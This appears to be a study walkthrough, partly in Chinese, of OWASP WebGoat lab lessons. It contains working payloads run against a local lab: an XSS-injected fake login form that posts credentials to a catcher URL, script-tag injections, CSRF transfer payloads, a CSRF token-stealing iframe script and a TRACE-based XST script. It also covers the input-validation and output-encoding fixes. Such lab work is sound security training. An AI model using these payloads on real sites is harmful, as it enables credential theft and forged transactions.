1. Phishing with XSS
</form><form action="http://127.0.0.1:8888/webgoat/catcher?PROPERTY=yes" method="post"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit"/><br><br><HR>

LAB: Cross Site Scripting

  1. Stage 1: Stored XSS

tom是jerry的manager有权限修改jerry的profile,输入和显示都没有做任何过滤。
或者也可以tom修改自己的profile,等待jerry浏览。

  1. Stage 2: Block Stored XSS using Input Validation

    这关,要解决stage1的问题,写入数据库的时候

    在某些需要用户自己输入一些支持的格式,可以使用

    正则表达式 白名单过滤;

    正则表达式 黑名单替换;

    通过DOM对象过滤白名单和黑名单的标签;

    对于支持纯文字的地方,可以html编码

    http://www.2cto.com/Article/201209/156172.html

/**Your code**/
String regex = "[\\s\\w-,]*";
String stringToValidate = firstName+lastName+ssn+title+phone+address1+address2+
startDate+ccn+disciplinaryActionDate+
disciplinaryActionNotes+personalDescription;
Pattern pattern = Pattern.compile(regex);
validate(stringToValidate, pattern);
/**End of your code**/

This validation allows following:
\s = whitspace: \t\n\x0B\f\r
\w = word: a-zA-Z_0-9
and the characters - and ,

Use of any other character will throw a Validation Exception. 
  1. Stage 3: Execute a previously Stored Cross Site Scripting (XSS) attack.

    bruce的profile里存在存储型xss.

    1. Stage 4: Block Stored XSS using Output Encoding.

    Solution:
    You have to use a static method called encode(String s) which is part of the class org.owasp.webgoat.util.HtmlEncoder.
    This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting class. Replace all answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done.

  2. Stage 5: Execute a Reflected XSS attack.

    search输入框那儿,存在反射型XSS

  3. Stage 6: Block Reflected XSS using Input Validation.

Solution:
The Solution is rather simular to stage 2. You have to edit org.owasp.webgoat.lessons.CrossSiteScripting.FindProfile.java. Alter the method getRequestParameter. The body of the mehtod should look something like this:

String regex = "[\\s\\w-,]*";
String parameter = s.getParser().getRawParameter(name);
Pattern pattern = Pattern.compile(regex);
validate(parameter, pattern);
return parameter;
  1. Stored XSS Attacks

    发送email中message存在存储型XSS

  2. Reflected XSS Attacks
QTY1=<script>alert(1)</script>&QTY2=<script>alert(2)</script>&QTY3=<script>alert(3)</script>&QTY4=<script>alert(4)</script>&SUBMIT=UpdateCart&field2=<script>alert(5)</script>&field1=<script>alert(5)</script>

所有能提交参数都试试,最后一个input框成功。

  • Congratulations. You have successfully completed this lesson.
  1. Cross Site Request Forgery (CSRF)

在mail的message处包含<img src='attack?Screen=13&menu=900&transferFunds=5000' width="1" height="1" />这段代码

  1. CSRF Prompt By-Pass
<form accept-charset='UNKNOWN' method='POST' action='attack?Screen=5&menu=900' enctype='application/x-www-form-urlencoded'>
<input name='transferFunds' type='submit' value='CONFIRM'>
<input name='transferFunds' type='submit' value='CANCEL'>
</form>
  1. CSRF Token By-Pass
<script>
var tokenValue;
function readToken(){
var frameDoc = document.getElementById("iframe1").contentDocument;
var form = frameDoc.getElementsByTagName("form")[1];
console.log(form);
var token = form.CSRFToken.value;
tokenValue = '&CSRFToken='+token;
loadFrame2()
}
function loadFrame2(){
var  Frame2 = document.getElementById("iframe2");
console.log(Frame2);
Frame2.src='http://127.0.0.1:8888/webgoat/attack?Screen=2&menu=900&transferFunds=4000'+tokenValue;
console.log(Frame2.src);
}
</script>
<iframe id="iframe1" src="http://127.0.0.1:8888/webgoat/attack?Screen=2&menu=900&transferFunds=main" onload="readToken()" width="500" height="200" scrolling="yes"></iframe>
<iframe id="iframe2" width="500" height="200" scrolling=yes></iframe>
  1. HTTPOnly Test
  2. SUCCESS: Your browser enforced the HTTPOnly flag properly for the 'unique2u' cookie by preventing direct client side read access to this cookie.
  3. SUCCESS: Your browser enforced the write protection property of the HTTPOnly flag for the 'unique2u' cookie by preventing client side modification.
  4. Cross Site Tracing (XST) Attacks

XST攻击也是攻击者将恶意代码嵌入主机上的Web文件,当访问者浏览时,恶意代码在浏览器中执行,然后访问者的Cookie、http基本验证以及NTLM验证信息将被发送到已经被控制的主机,同时传送Trace请求给目标主机,导致Cookie欺骗或者是中间人攻击。
XST攻击条件:

1、需要目标Web服务器允许Trace参数;

2、需要一个用来插入XST代码的地方;

3、目标站点存在跨域漏洞。
XST与XSS的比较:

相同点:都具有很大的欺骗性,可以对主机产生危害,而且这种攻击是跨平台的,我们还可以利用Active控件、Flash、Java等来进行XST和XSS攻击。

优点:可以绕过一般的http验证以及NTLM验证

<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>"); document.write(str1);}</script>

其他平台的练习: